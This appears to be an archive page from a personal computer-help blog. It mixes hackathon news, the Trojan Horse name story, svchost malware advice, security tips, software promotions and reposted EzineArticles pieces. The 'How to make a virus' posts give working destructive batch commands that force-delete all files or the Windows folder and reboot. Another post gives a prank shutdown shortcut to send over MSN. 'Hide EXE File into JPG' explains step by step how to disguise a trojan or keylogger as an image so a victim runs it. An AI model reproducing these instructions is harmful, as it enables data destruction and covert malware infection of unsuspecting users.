Showing posts with label Anti Viruses - Spyware. Show all posts
Showing posts with label Anti Viruses - Spyware. Show all posts

Sunday, July 14, 2013

Yahoo! Hack India to be held in Hyderabad

20953265[1] NEW DELHI: Programmers, developers, designers across the industry and student stop technical universities in India will gather at Hyderabad for a two-day hacking event.

Over 1,000 developers across 20 states had signed up to participate in the sixth edition of "Yahoo! Hack India"July 13, of which 250 best hackers have been selected after an entry-level coding challenge.

"These hackers will now participate in the two-day event which brings forth a series of technical workshops, followed by a nonstop 24-hour coding Hackathon on July 13 and 14," a statement said.

For the first time, Yahoo! Hack India is being organized in cyber city Hyderabad. This will be Yahoo!'s first hack event in India hosted outside Bangalore,Yahoo! has its second largest research and development centre.

JMD COMPUTER India - Outsourcing Website Development India - website development India - e commerce development India

Due to overwhelming response developers across India in the last five years, Yahoo! had decided to expand this hack events to cover more Indian cities over the next few years.

"This year will see two external hack events by Yahoo! in India, one in Hyderabad and another in Bangalore later in this year. The event brings together programmers, developers, designers across the industry, start ups and students the top technical universities," it said.

"Hackers team up to turn their ideas into a working prototype, or hack, as it's called in just 24 hours. It gives developers a chance to work together and build applications and product ideas scratch using market-leading technologies Yahoo! as well as other technologies, to develop something cool that can potentially solve a real-world problem that impacts Internet users," it said.

The two-day event involves a hacking competition using a great collection of new web tools, services and APIsBSE 0.00 % ( Application Programmable Interface), as well as data around the web.

Yahoo! Open Hack was started as an internal event in 2006 at Yahoo! headquarters in Sunnyvale, US with an aim to bring the Yahoo! developers together. So far, Open Hack has been hosted in seven countries with representation over 30 countries.

The first Open Hack in India was hosted way back in 2007, which was attended by 180 developers in and around Bangalore.

Sunday, November 6, 2011

Laptop Tracker Software For Quick Heal Users - English Version


Friday, March 4, 2011

Interesting story behind Trojan Horse

We all have heard about the viruses named Trojan Horse, Trojan Horse is a kind of virus which appears to perform it’s intended tasks, But silently steals all the information from your computer or harms your computer in a way which may be difficult to recover.

Interestingly I got to know a story about the name Trojan Horse virus, Here it goes…

In Greek Mythology they believe there was a city called, City Of Troys & there was other kingdom of Greeks. They fought for about 10 years and the war was called the Trojan War. After 10 years of fight the greeks still had nothing in their hands, it was a fruitless siege , So the greeks declared that they quit from the War.

Now the greeks built a giant horse made of wood & gave it as a trophy of victory to the citizens of Troy called TROJANS. The trojans happily took the horse inside the city. On the same night the trojans were busy celebrating their victory while 30 soldiers who were hiding inside the Giant Wooden Horse came out  & opened the city gates for the Greek Army. The Greek army then destroyed the entire troy city.

Since then everything that causes the target to bring a vulnerable object in to a secured area is referred as a Trojan Horse. Hence the name Trojan Horse is given to viruses that pretend to be something else, but once they are inside the system they start messing up the entire system.

SvcHost Exe process info & virus details

What is an SVCHost.exe file? & What is it doing in your task manager?

An svchost.exe file is a windows generic host process & is there for a good reason, This files is a native integral part of the windows operating system. It basically supports various windows services running from the Dynamic Link Library (DLL) files of windows. The services that may require SVCHOST.Exe include Windows Firewall, Automatic System Updates, Windows themes , Plug and play, Fax & printer services & many more. These services ideally start automatically when the windows system starts. These files are found in all windows operating systems launched after windows 2000 NT. (i.e Windows XP, Vista & 7).

clip_image001

When your windows system boots, The Svchost.exe file checks the windows registries & automatically builds a list of services that needs to be loaded. Usually each SVChost.exe carries different services from windows. If you find multiple SVChost.exe files in your task manager, there is nothing to worry about, it’s absolutely normal for windows to run multiple svchost.exe simultaneously.

SVCHOST.exe Virus & Removal

It is possible for malicious software’s to modify the windows registry & make SVCHOST.exe process to load the wrong malicious .dll files. Which will endup in making your computer or network affected with viruses and malewarez.

Another common approach is those viruses files are names SCVHOST.exe did you see the difference in the filenames? SVC vs SCV??

What this file sCvhost.exe does is that it allows hackers to access all your personal information, This is a virus of tye W30/Agobot-S, You may also call this a trojan horse. Since it hides itself with a genuine process name.

How to remove Svchost.exe virus or sCvhost.exe virus:

1. Removing the Svchost virus can be a very tedious task, Though i personally managed to somehow remove the virus using advanced tactics, It is not recommended that you try and follow the same, Because a single mistake could lead to a damaged Operating system, Which would be difficult to recover.

2. So instead of giving you the steps I find it appropriate to suugest you that you should use an Anti-virus to do this for you.

3. You can grab your self a free copy of antivirus over here (Norton Internet Security).

100% CPU utilization error in SVCHOST.EXE Process & Memory Leaks:

The first solution to this problem is that you may just want to restart the computer, Most of the times this will solve your problem, Another quick solution for this problem is to start the task manager & find the process causing this problem & then right click the process name and set the priority to low.

Sunday, May 2, 2010

Steps to Protect Your Computer..!!

1. Turn on automatic updates.

After installing your operating system, you usually forget to pay attention on operating system updates. If your operating system is not updated for protection against loopholes and security threats found after you installed it, your computer may be vulnerable to outside world. Hackers can get access to your computer by using these loopholes and they can do anything with your computer. So, to keep you safe, turn on automatic updates. When automatic updates are turned on your operating system is updated frequently and you will be safe from unwanted trouble. You can turn on automatic updates from Control Panel => Security Center => Automatic Updates. You must be logged in as Administrator to change this setting.

2. Turn on Windows Firewall.

Windows Firewall is a barrier between your computer and outside internet. It protects you by filtering incoming and outgoing traffic and allows only trusted programs to communicate through internet. You can turn on Windows Firewall from Control Panel => Windows Firewall. You must be logged in as Administrator to change this setting.

3. Install good anti-virus software.

Anti-virus software protects your computer from viruses that can damage your computer. Only installing anti-virus software is not enough. Your anti-virus software must be updated regularly with latest virus definition database, as new viruses are found daily.

4. Run windows in a restricted mode.

When you log in using a limited account, you are protecting your computer from various threats, as limited account runs in restricted mode and can not damage your computer by changing system files or registry. In fact, limited account can not install new programs and can not write to system files or registry, thus making you safe from unwanted programs which gets installed automatically from internet without your knowledge. Log in as Administrator only when you want to do some maintenance work or install new programs.

5. Do NOT click on untrusted links.

You should not click any link received in your email, unless you trust the sender. If you click on this untrusted links, it can take you to fake websites and can steal your user name, password, credit card details, or can install unwanted programs without your knowledge. Instead of clicking on the link you received in your email, copy the link address and paste it in a new browser window. Before writing your user name, password, credit card and any other personal details, recheck the domain name in address bar.

6. Do NOT write in pop up windows.

You should write your user name, password, credit card and any other personal details in main window only. If during your work, any pop up window opens asking your password or credit card details, close it immediately. DO NOT write your personal information in any pop up window.

- JMD Computer                                                  Give Comment

Friday, November 20, 2009

Update your Windows XP drivers

Fast, quick and easy, DriverScanner boosts computer performance by scanning for, downloading and then installing updates for all your device drivers including:
  • Monitor, mouse, keyboard, CD/DVD
  • Sound & graphics cards
  • Motherboard & BIOS, USB, Modem & network adapters
  • Camera, printer, scanner & other plug and play devices

    What are drivers?

    Drivers are snippets of software that are needed for your Windows operating system to communicate with each of the hardware devices that are connected to your computer.

    Why should I update my drivers?

    Like any software, drivers are upgraded and updated by the manufacturers, to remove bugs, add extra functionality to the hardware or to improve the performance of the device. Unless you update your drivers regularly you may face problems ranging from the relatively minor, such as having hardware that seems buggy and poorly performing, to the more major such as hardware failures, conflicts and complete system crashes.

    What does Driver Scanner do?

    With so many drivers on your PC you can´t check them all yourself, which is why DriverScanner, the innovative new product from Uniblue, is the perfect solution to your driver update problems. This useful application will search your PC for all installed drivers and then cross reference these against Uniblue´s authoritative library of drivers. Where DriverScanner identifies outdated drivers it will then give you the tools to update your PC with the latest versions, so improving the performance and stability of your computer and its peripherals.
    Release the full functionality of your PC now with Driver Scanner.


    - JMD Computer                                                         Keep Comment



    * if Link is Broken, fill free form click here with Link Details.

Monday, November 2, 2009

Error Reporting in XP

image

If error reporting in XP is bugging you then turn it off.

When a system error occurs in XP, a little dialog box appears asking if you want to report the error to Microsoft. Click the message box to make it disappear. You don't have to report the error if you don't want to and on today's "Call for Help" Leo shows you how to turn off the feature if you find it distracting.

To disable error reporting, follow these directions:

1. Right-click My Computer and choose Properties.

2. Click the Advanced tab on your System Properties dialog box.

3. Click the Error Reporting button on the Advanced tab.

4. Place a checkmark next to "Disable error reporting."

5. Leave the other radio button unchecked next to the text labeled, "But notify me when critical errors occur."

6. Click OK.

- JMD Computer                                                     Keep Comment

* if Link is Broken, fill free form click here with Link Details.

Thursday, July 9, 2009

How to make a fake virus

This Cannot Damage your computer it only shuts it down

Step 1: Right click on your desktop.

Step 2: Click create new shortcut.

Step 3: Copy and paste the following: shutdown -s -t 02 -c "BYE!"

Step 4: Rename it as Application

Step 5: Right Click on your Desktop

Step 6: Click on New Compressed Zipped Folder

Step 7: Rename the compressed zipped folder to "stuff"

Step 8: Drag and Drop the the Application folder you created into the compressed zipped folder.

Step 9: Send it over msn

Step 10: Enjoy!

- JMD Computer                          Keep Comment

Source:- http://www.stuffyouneedtoknow.page.tl/How-to-make-a-fake-virus.htm

How to make a virus

How to make a powerfull virus on Notepad.


This information is for educational purposes only don't be a jerk and try this out I will not be held responsible if any damage occurs to anything.

Step 1: Go to Start
Step 2: Type in Notepad
Step 3: Copy and Paste the following into notepad: DEL /F /Q *

Step 4: Save this as: "Virus.cmd" (with out quotation marks you must have .cmd)
Step 5: Don't open it. It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.

Step 6: Enjoy!

How to make a Virus that deletes the WINDOWS file

Step 1: Go to Start
Step 2: Type in Notepad. Hit enter
Step 3: Copy and paste the following: erase C:WINDOWS
Step 4: Save as: Cancel.cmd (you must have the .cmd)
Step 5: Don't Open it. It will DELETE your windows and then you have to reinstall it.
Step 6: Enjoy!

Another way...

Step 1: Open up notepad
Step 2: Copy and paste the following:
@echo off
del C:/Program Files
del C:/Documents and Settings
del C:/WINDOWS
echo Windows has Comitted Suicide
pause

Step 3: Save it as: Anything.cmd

Another way...

Step 1: Open up Notepad
Step 2: Copy and paste the Following:
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00
Step 3: Save it as: whateveryouwant.cmd

 

- JMD Computer                       Keep Comment

Source:- http://www.stuffyouneedtoknow.page.tl/How-to-make-a-virus.htm

Monday, April 13, 2009

NoD 32 AntiVirus

NOD32
The NOD32 antivirus system provides balanced state-of-the-art protection against threats endangering your PC. Viruses, worms, and other malware are kept out of striking distance from your valuable data. Advanced detection methods implemented in the software provide protection against a great proportion of the worms and viruses that are still awaiting creation.

Eset NOD32's latest version is sleek and recommended. The company currently provides a 30-day, full-featured trial, with no third-party toolbars added on nor other strings attached.

Installation is clean and straightforward. So is the interface, which has improved greatly from its humble beginnings as separate scanners that once littered the desktop. Combined into one interface, NOD32 can be toggled between standard features and more advanced features. Although our scans were a little on the slow side, system-resource use was low, and the results good. NOD32 has consistently scored near the top of several independent antivirus testing organization ratings for finding the most malware.Should you decide to uninstall, there is an uninstall option. However, upon reboot, we found residual system files and Registry settings that have to be deleted by hand.

Click

Thursday, April 9, 2009

BEWARE of "Conficker worm's " VIRUS attack today

A malicious software program that has infected millions of computers could enter a more menacing phase on Wednesday, from an outright attack to a quiet mutation that would further its spread.

Computer security experts who have analysed the Conficker worm's code say it is designed to begin a new phase on April 1, and while it's unclear whether it will unleash havoc or remain dormant, its stubborn presence is rattling businesses with multimillion-dollar budgets to fight cyber crime.

Conficker, believed to reside on 2 - 12 million computers worldwide, is designed to turn an infected PC into a slave that responds to commands sent from a remote server that controls an army of slave computers known as a botnet.

"It can be used to attack as well as to spy. It can destroy files, it can connect to addresses on the Internet and it can forward your e-mail," said Gadi Evron, an expert on botnets who helps governments protect against cyber crime.

But like many security experts, he doubts Wednesday will see a big attack.

The virus has been powerful enough to attack infected computers for months by exploiting weaknesses in Microsoft's Windows operating system.

Evron and several other analysts said Wednesday's change could simply give Conficker enhanced functionality, possibly making it more dangerous.

"This is the electronic equivalent of being told there is a major storm that has a 20 per cent chance of hitting," said Mark Rasch, an executive at Secure IT Experts who spent 25 years prosecuting computer crimes at the US Department of Justice.

"It's not time to hide in the bunker. But it might be prudent to look out the window," he added.

In February, Microsoft announced it was offering a $250,000 reward for information leading to the arrest and conviction of whoever is responsible for creating Conficker, saying the worm constituted a "criminal attack."

Fears of ID Theft

Botnets are a major worry because they can surreptitiously steal identities, log sensitive corporate information, credit card numbers, online banking passwords or other key data users of infected PCs type on their keyboards

- Pramod Ambady

- JMD Computer

Tuesday, March 31, 2009

Hide EXE File into JPG

This is a good trick to hide your exe files into a jpg file..!
How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whateve you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-

'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-

%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.

This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

Source:- http://www.insecure.in/hide_exe_jpg.asp

Wednesday, March 11, 2009

Antivirus2009 - How to Remove Antivirus2009 Easily and Safely

If you are reading this article then your computer must be infected by Antivirus2009. Antivirus2009, Antivirus2008 and XP antivirus are categorized as rogue anti-spyware. They are very complicated viruses. What you see in your computer will be pop ups and annoying redirection when you are browsing. But did you know that they can also reveal your personal information, steal your credit card number and use it? Yes they can! Do not panic I will show you how to remove them quickly and safely now.

The first thing that you should do now is to go to my recommended sites and get a free scan there. You can use the free scan without registering or paying. I highly recommend you to do this before it is too late for you and your computer. What are those sites that I recommend? Those are sites of best anti-spyware which I used myself when my PC was infected by Antivirus2009. Now my PC is clean and error free. I am sure these sites will help you too.

How to prevent Antivirus2009 from entering your PC?

  • antivirusWhen you download something from P2P network, be sure to scan it first, cause they might be infected by Antivirus2009 or other malicious spyware.
  • Shareware and Freeware are Free for a surprising reason, they usually are bundled with spyware and malware. Be very careful.
  • Be careful when you are browsing the internet. When you visit an infected site your computer will be at risk.

To remove the risks you need a top notch anti spyware. It will provide your computer real time protection from spyware and other malware. So you can browse the internet without worry. I have tested many anti-spyware and listed the best for you. I hope this can save you a lot of trouble.

Get your totally free scan here. These anti-spyware are award winning programs with certification from many third party consumer watchdogs. Join millions of satisfied users and free your computer from malicious software now.

Article Source: http://EzineArticles.com/?expert=Daly_Coleman

Tuesday, March 10, 2009

Computer Firewalls

A firewall is a computer software that provides protection from hacking attempts from the Internet. It is very important to install a suitable firewall software to protect the computer from spyware and virus infections. A large number of security companies have developed firewall software. Some of these software are free for personal use.

A firewall software is basically a "packet sniffer". Data that gets transferred via the Internet moves in the form of packets. The firewall software intercepts these packets, analyzes its contents and determines if it is harmful to the computer. If the packet contains malicious content, the firewall blocks it from accessing code on the computer, thus preventing damage to the computer.

Most spyware, malware and virus programs can be prevented by installing a suitable firewall. Firewalls can also prevent software from accessing the Internet and transmitting information without the user's knowledge. Thus even if a virus program gets installed on the computer, it still won't be able to access the Internet and transmit sensitive information like credit card numbers, etc.

The latest version of Microsoft Windows i.e. Windows Vista has an inbuilt firewall in it. This means if you are using Vista, you don't have to download and install additional firewall software. However, if you still want to install a third party firewall, you can do that for added protection.

For maximum protection, it is advisable to invest in an "Internet Security Suite". This is a software bundle that combines a virus scanner, email scanner, spyware protection and a firewall. By installing such software, you can get complete protection from all sorts of malware programs that spread via the Internet.

More information: Free spyware removal

Article Source: http://EzineArticles.com/?expert=John_Browning

Do You Have a Virus? Basics of Virus Removal

If you have a virus your doctor probably prescribed an antibiotic for you. It is too bad the same cannot be applied to a computer. A computer virus attacks at many levels. It moves throughout your system and can be difficult to eradicate. In advanced cases it can get into the root area and prevent your system from booting up. If this happens you may have to format ( erase ) your hard drive and reinstall the operating system. This is time consuming and unnecessary if you have the proper protection. The regular user will find it beyond their ability to do this and will contemplate taking their computer to a repair shop. Don't do it! Until you read this! I will help you to try to do this on your own. If you are still unable to fix the problem yourself I implore you to find an alternative to a computer repair shop. If you know a friend or family member that knows a little about computers they can probably do it.

First of all you need a good antivirus program. See my site for recommendations. An antivirus program can protect you, but if you are already infected please read on. You will run the program and it will find a virus and you think GREAT! This was easy. Not so fast! People write these nasty things to avoid removal. The virus will duplicate, replicate, and move around to avoid discovery and removal. You have to attack the virus just like it attacked you.

What I am going to tell you now you must consider carefully. If you have a backup program, use it. Remember most backup programs will only restore your computer to a predetermined state which means that your computer will 'go back in time' and will not retain any additions such as updates to programs, drivers, files (pictures and anything else you have saved since.), or anything else. I do encourage active use of a backup program for many reasons. ( What if your hard drive fails? ).

If you do not have a backup then here is what you must do. Running an antivirus program will hunt down and find the virus. I have found that you will need to run it several times, but what you need to know is that you must turn off system restore (XP users). System restore will SAVE the virus! Please remember that once you disable system restore you will lose all restore points. This is what you want to do. Here is how to do it. Right click on my computer and choose properties. Select the system restore tab and check turn off, it will take a moment but this is normal. Go back to your desktop and run your antivirus. Once you have removed any malware you MUST go back and turn on system restore again. In my opinion system restore is not really a program of much value. When I need it most it won't restore!

 

A quick note here, if you want to backup your system and you need a program you can visit my site. You can also find the free Microsoft backup utility by, (if it was installed) clicking start/ programs/ accessories/ system tools/ backup. If not installed you can add it from your installation disk. It will consume space so only select C (system drive) and unselect everything unnecessary and also select System State.

Good Luck!

Maumee Valley Computer.

Providing software for computer security and optimization that is user friendly and effective. Clean, protect, and optimize your computer to restore peak performance.

http://jmdcomputer.blogspot.com/

Article Source: http://EzineArticles.com/?expert=Alan_Hohenbrink

How to Use Google Chrome For Secure Web Surfing by Default

If you have ever shared a log on or computer for your web browsing you'll know how annoying it can be not to have secure web surfing. Organize a surprise party or weekend away and then a list of hotels appears in your partners browser next time she logs on. It's almost like you share a common surfing history in the house.

Let's face it perhaps you don't want your kids to visit all the same web sites as you!

There's nothing ground breaking in Chromes Incognito mode but it is a very useful feature. Switch to Incognito mode and your web surfing instantly becomes a little more secure.

This is how you can use Chrome for secure web browsing, simply right click on the Chrome Shortcut on your desktop, select properties and you should see the shortcut menu appear.

1) Right Click on Chrome Shortcut on Desktop
2) Select Properties
3) On Shortcut menu add the following to target shortcut menu -incognito

Therefore every time you start Chrome using that shortcut now you will be in 'incognito mode'. If you just want to use this mode occasionally then you can select a 'incognito' windows from the file menu.

All the web sites you visit are now not recorded in your history, all cookies are deleted when you close. There's no trace of the web sites stored on your computer at all. Most of the browsers offer similar functionality now but most have to be done manually (so people forget). Overall I guess Firefox with it's multitude of plug-ins and open source model will hopefully produce the ultimate secure browsing. I'll have a look at these options in a later article.

Of course, it's a long, long way from real secure web surfing, we still use HTTP which means your browsing is in clear text. Your browsing history and IP address are also stored on the web site you visit, on the ISP logs. But it is a start and at least can keep your PC holding a huge list of your web browsing.

If you want the ultimate secure browsing, have a look here - Secure Surfing Protection

Try the new free demo of Identity Clocker on the link below.

Anonymous Surfing Program

Take care and stay safe.

Article Source: http://EzineArticles.com/?expert=Jim_Rjindael

Can Google Chrome Help Secure Web Browsing?

If you have to share a computer either at home, work or school then you'll soon realize that you leave a trace of your web history on the computer each time you use it - it's not exactly secure web browsing. This can be quite annoying at times, if you're trying to arrange a surprise, buy a gift then leaving a trail of web sites behind you can slightly give the surprise away.

There is of course even more serious side when so many of use the internet for lots of private stuff like banking, investments or research. Using a shared computer has a lot of risks to it so most of the browsers are introducing features to deal with this.

Google's Chrome browser has probably the most advanced of these features at the moment although there isn't a lot in it with IE and Firefox both offering similar features. The privacy mode in Chrome is called Incognito mode and it can help your web browsing become a little more secure.

To enable Chrome's Incognito mode just select a new incognito window from the file menu. Then all your web browsing is slightly more secure, no cookies are stored, no logons cached and history maintained on the PC you are using.

If you want to start this mode automatically follow this procedure.

1) Right Click on the Chrome Shortcut on the desktop
2) Click on Properties
3) On the Shortcut - just add the following to the target line -incognito

(make sure you leave a space and add outside the inverted commas)

Then every time you start Chrome using this shortcut it will run in incognito mode. This will prevent any details of your browsing being left behind on your computer and all the cookies will be automatically removed. There are unfortunately many other traces of your web history so this is not totally secure web browsing but it is an important step.

Of course, it's a long, long way from real secure web surfing, we still use HTTP which means your browsing is in clear text. Your browsing history and IP address are also stored on the web site you visit, on the ISP logs. But it is a start and at least can keep your PC holding a huge list of your web browsing.

If you want the ultimate secure browsing, have a look here - Secure Surfing Protection

Try the new free demo of Identity Clocker on the link below.

Anonymous Surfing Program

Take care and stay safe.

Article Source: http://EzineArticles.com/?expert=Jim_Rjindael

A Guide to Choosing Internet Privacy Software

It can be quite confusing looking at the various types of internet privacy software on the market today. Hopefully I can clarify some of the features to help you decide what is right for you.

First of all I should perhaps clarify the two major types of privacy software that is available. The first group protects your local PC and information stored there, this includes the web browsing history, cookies, local images and files associated with your internet surfing. The idea behind this software is that when you delete or remove these traces of your surfing they are not completely destroyed.  With the right technical skills it is possible to recover these details. You'll mostly find this group of software focusing on evidence removal and destroying local traces of your browsing.

Before you spend lots of money on software like this remember that most of the browsers now have increasingly impressive privacy feature built in. Read up about things like Chrome's Incognito mode for instance which supposedly doesn't store any data locally on the PC when you browse.

The second group of products in the internet privacy software market is those that protect your connection and privacy online. You may not be aware but every time you use the internet absolutely everything you do is logged and can be traced back to your computer via it's IP address.  Every web request, every email or message is initially logged at your ISP (Internet Service Provider) - this is by far the most complete record of all your online activities. Next you leave a record in every web site you visit where your IP address is also recorded, finally the vast majority of your browsing happens in clear text so it can be picked up, logged or intercepted anywhere on it's journey around in the internet.

The internet privacy software products  in this area tend to focus on one or two of these areas but you should really protect against them all.  Here's a summary of points you should look for

1) Encryption - if the product doesn't encrypt your connection then you all your details and browsing will be logged at the ISP (a proxy doesn't help with this)

2) Anonymous Proxies - to protect your IP address being logged by the web servers you visit, you'll need to surf via a proxy server.  Make sure the software doesn't just route your connection via a free anonymous proxy on the internet - these are extremely  unsafe and very often used by identity thieves to steal data.

3) Speed - often overlooked and another reason why you shouldn't use free proxies.  Make sure that there are fast private proxies that you can surf at normal speed.

Hopefully this has given you an insight into some of the features that you should be aware of when looking to purchase internet privacy software, there are lots of options make sure you buy the one that's right for you.

If you want to see how the most secure browsing solution available on the internet - you can try the trial version of the software I use to protect my identity - Identity Clocker.

Anonymous Surfing protection

Article Source: http://EzineArticles.com/?expert=Jim_Rjindael

Sunday, February 8, 2009

Setting Up a Secure Wireless Network - Part 3

Welcome back! I'm glad to see you are not interested in "just" being secure, but you want to be very secure. There are pros and cons to this. You know the pros. Security! , but first of course is my:

DISCLAIMER: While every reasonable precaution has been taken in the preparation of this document, the author is not responsible for errors or omissions, or for damages resulting from the use of the information contained herein.

The information contained in this document is believed to be accurate. However, no guarantee is provided. Use this information at your own risk.

OK. Here are the cons:
  • No DHCP (Dynamic Host Configuration Protocal) Server. You will need to set your IP addresses manually on all the wireless and wired clients you want to hook to your network.
  • No viewable SSID. You will have to remember the name of your wireless network, then manually join wireless clients to your network.
  • No standard IP address for your router. You will have to remember what you set that to. (This is easy as you can always check the IP address of a computer connected to your network.)
  • MAC (Media Access Control) will be used. This is like a computers finger print. You will have to remember to allow this computer into your network. Unless they are explicitly allowed to join the network they will not be able to unless this step is complete, even though they know the SSID and Shared Key.
Note: on't make these changes with a wireless client. You will not be connected for very long if you do. Use the computer that is hard wired to the router. PRINT this document or save a copy of it local on your computer. There will be places where you will not be able to get to the Internet to read this until some changes are made. You need this document to make those changes. This documentation has been done with Windows XP. If you have Windows Vista the documentation will not match exactly. The settings are the same, but getting to the place the settings are made will be a little different. Read through this document before making any changes.

Please be aware that these are no rock solid guarantees to keep people out of your network. These following steps are simply deterrents, and can be gotten around if the intruder wants in bad enough. If you have gotten to this point I need to make something perfectly clear. The encryption you are using is your number one defense. Don't do these steps if you have set a key like "mynetwork", or used WEP for your security. Use the strongest security available (WPA-AES) and have at least a 20 character key with numbers and upper/lower case characters. There should be no words in there that can be found in the dictionary. That being said let's get on with the deterrents.

Go into the local LAN settings and change the IP address of your router. If the default IP address of your router is 192.168.1.1 change it to something like 192.168.112.86. You can use 10.x.x.x or 172.16.x.x. Replace the "x" with any number under 255. Remember the number you used as it will become the default gateway and the DNS server for your network and you will have to set it in the client since we are going to disable DHCP. Make the changes and apply them. This makes guessing your IP range harder for the intruder. Leaving it set to the default just makes it easier to get into your network.

The computer hard wired to your network should still be able to connect to the network since it is using DHCP to get an IP address. You will have to change the address in your browser to the new IP address to get back into the router settings. That will change with this next step. You will have to hard code the IP address in the client to be able to get back on the network.

Go into the web interface and to the LAN settings. Find the DHPC server and disable it, or uncheck enabled. Save the settings. At this point you will not be able to get into your network. You have just told your router not to give any computer an IP address. If they want in they need to know an IP address that fits the network. To get back into your network we need to do this.
  • Right click on My Network Places and choose Properties.
  • Right click on the Local Area Connection that matches your Ethernet adapter. If you have a wireless adapter you will see two. Choose the LAN connection, or the one that is hard wired to your network. Choose properties.
  • In the box labeled This connection uses the following items:
  • scroll down to Internet Protocol (TCP/IP).Click on it then click on the Properties button.
Click the Use the following IP address and Use the following DNS server addresses radio buttons. The boxes will become white and you can enter data into them. Enter the following data: This is what you would enter if your routers IP address is 192.168.89.1
  • IP address: 192.168.89.2
  • Subnet mask: 255.255.255.0
  • Default gateway: 192.168.89.1
  • Preferred DNS server: 192.168.89.1
Click the OK button and you should be able to get back in to your network from a hard wired computer. If you have a wireless adapter you will have to follow these steps in your wireless clients to allow them back into the network.

Note: ***You cannot have any clients with the same IP address***. Increment the last number by 1. Example, the wireless client would have an IP address of 192.168.89.3. The Subnet mask, default gateway, and DNS server address will not change. Keep then the same on all clients.

Your wireless client should not be able to access the network. Let's make a few more changes before we join it to the network.

Next we are going to enable MAC filtering. This will only affect wireless clients. What you are doing is telling the router that only the specified MAC addresses are allowed in the network, even if they know the encryption and key. To do this go to Wireless Settings and find a box labeled Enforce MAC Filtering, or something similar to it. Check it an apply it. When the router reboots you should see the MAC address of your wireless client in the list. You can find the MAC address of your client by opening a DOS box like we did earlier and enter "ipconfig /all" without the quotes. You will see the information about your wireless adapter.

If you want to allow other wireless clients into your network you will have to edit the list and allow them. MAC addresses can be spoofed, but this is another layer of security that you can implement.

So far we have changed the IP address of your router, disabled DHCP and set MAC filtering. I will take it for granted you had, or have changed, your encryption to be as strong as possible. The last thing we will do is not broadcast your SSID. What this means is where you look for Available Wireless Networks you will not see yours.

To disable the broadcasting of your SSID from the web interface for you router go to Wireless Security and uncheck Broadcast SSID and apply it. Your router will reboot.

Now, on to the wireless clients. You will have to assign your wireless client a static IP address. Do the exact same steps as above to do this, but choose the wireless adapter. Once you have a valid IP address you should be on the network. Your wireless client already knows of the SSID and the settings. If you View Available Wireless Networks your SSID will be there.

If you bring in another wireless client it will know nothing about your network. You will have to do the following to get it into your network.
  • Set your IP address, Default gateway, etc... on the new wireless clint
  • From the Available Wireless Networks dialog choose Set up a wireless network for home or small office.
  • Select Create a new connection.
  • The Welcome to the Wireless Network Connection Setup Wizard will start. Click Next.
  • Enter your Network name (SSID): "your network name"
  • Select Manually assign a network key
  • Check Use WPA encryption instead of WEP (WPA is stonger than WEP but not all devices are compatible with WPA).Click Next
  • Enter your key twice. Click Next
  • Choose Setup a network manually
  • Click Finish

You should now be connected to the wireless network.


This concludes PART3 if you would like to get things even stronger please review the final chapter PART4


A direct link to this article, complete with images can be found at TechAlternatives


Helping you Discover Your Choices


Article Source: http://EzineArticles.com/?expert=Keith_Hagans

To Fix a Slow Running Computer, You Need the Right Tools

When people bring me their computers for repair, there is one problem that motivates them to bring it to my shop more than any other. It is the computer is running slow. Maybe the computer has other problems, but the running slowly part bothers them the most.
There are a few things that can happen to a computer to slow it down and I will talk about these things in this article. However, there is one problem that often goes overlooked when discussing things that need to be done to get a computer's speed back. We will not overlook this problem.
Spyware/Virus And Registry Cleaners
It is well documented what spyware and viruses can do to a computer's operation. It can slow it down and in extreme cases it can cause the computer to be unable to start up. Even worse, spyware can steal a person's identity! For these reason, most people have spyware/virus cleaners installed on their computers.
Another problem most people are aware of is registry corruption. Registry corruption is actually more of a problem with Windows XP and Vista than it was with older operating systems. The newer operating systems have a much larger hierarchy. This allows a little corruption to disrupt many more operations than it could on Windows 98, for instance.
In any event, registry corruption can make a PC unstable and cause it to become very slow. Only keeping the registry clean will prevent a computer from falling into a registry corruption malaise and using a good registry cleaner periodically is the only way to prevent this from happening.
What Else Could Go Wrong?
Still, there are times when I run into computers that have slowed down but aren't infested with any type of virus/spyware or registry corruption. This of course, means there is some other problem slowing down the computer and many times finding the cause of the slowdown is a formidable task!
A large percentage of the time, the problem I find in a case like this, will involve an outdated or unstable driver. Coming to this conclusion is one part of the job of repairing a computer with this type of problem. Finding a replacement for the questionable driver and then installing it is yet another task that needs to be completed.
The New Tool In Town
